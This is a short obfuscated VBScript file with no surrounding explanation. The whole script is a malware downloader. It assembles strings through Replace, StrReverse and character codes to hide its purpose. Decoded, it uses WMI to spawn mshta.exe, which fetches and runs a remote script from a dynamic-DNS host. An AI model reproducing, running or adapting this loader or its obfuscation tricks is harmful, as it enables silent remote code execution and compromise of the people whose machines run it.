
VGFWPUSIHKTUNPKXDCFWWO = ""&chr(51)&"n"+"i"&chr(119)&""
FKRRUUUSBCAYLDNSPGBEPY = Replace("2"+VGFWPUSIHKTUNPKXDCFWWO+"BDPOGGDAARKPKEOGCSKKKDt","BDPOGGDAARKPKEOGCSKKKD",":"&chr(115)&"")
LOFVODFSUBXGNTVYQKWXJI = Replace("rCXPYLLPAUARKLTXANKYTVS_"+FKRRUUUSBCAYLDNSPGBEPY+""&chr(77)&"","CXPYLLPAUARKLTXANKYTVS",""&chr(80)&"")
HANXCNJQENNPWXHOVFWUFZ = Replace("FIBSZURXTSPSEWYODADGBY"+LOFVODFSUBXGNTVYQKWXJI+"g"&chr(77)&"","FIBSZURXTSPSEWYODADGBY","o")
LCDZXRGJQHAEZCBHZDYYXC = Replace("CWJAKZAONELOOJLXBOKLAP"+HANXCNJQENNPWXHOVFWUFZ+"ni","CWJAKZAONELOOJLXBOKLAP",""&chr(69)&"c")
GFEESDGLZYSAOETWTOKFBL = ""&chr(69)&".a"&chr(116)&""
DBQSPOXLWPNGUWDAKVBFZJ = ""&chr(88)&""+GFEESDGLZYSAOETWTOKFBL+"h"
LWJXPAJCZTVRNTENUYFOTI = ""&chr(69)&""
set ZZCRPKVHDODRHNTGNEBYFZ = GetObject(Replace(StrReverse("NNHWZCEXSCRIAPYAVHQFFGNNHWZCEXSCRIAPYAVHQFFG"+LCDZXRGJQHAEZCBHZDYYXC+"w"),"GFFQHVAYPAIRCSXECZWHNN",""&chr(115)&""))
KXFRXSUHLNSNRAWCXLVBOU = ZZCRPKVHDODRHNTGNEBYFZ.Create (Replace(StrReverse(" "+LWJXPAJCZTVRNTENUYFOTI+""+DBQSPOXLWPNGUWDAKVBFZJ+"sAZHQAWGSZWIUKAJFLLSSWN"),"NWSSLLFJAKUIWZSGWAQHZA",""&chr(77)&"")+Replace(StrReverse("txt.ssapyBCQVGIJXIGFFDVLDCAAFUOWpizCQVGIJXIGFFDVLDCAAFUOWue.sndy.nikhsupCQVGIJXIGFFDVLDCAAFUOWCQVGIJXIGFFDVLDCAAFUOW:ptth"),"WOUFAACDLVDFFGIXJIGVQC","/"),null,null,processid)
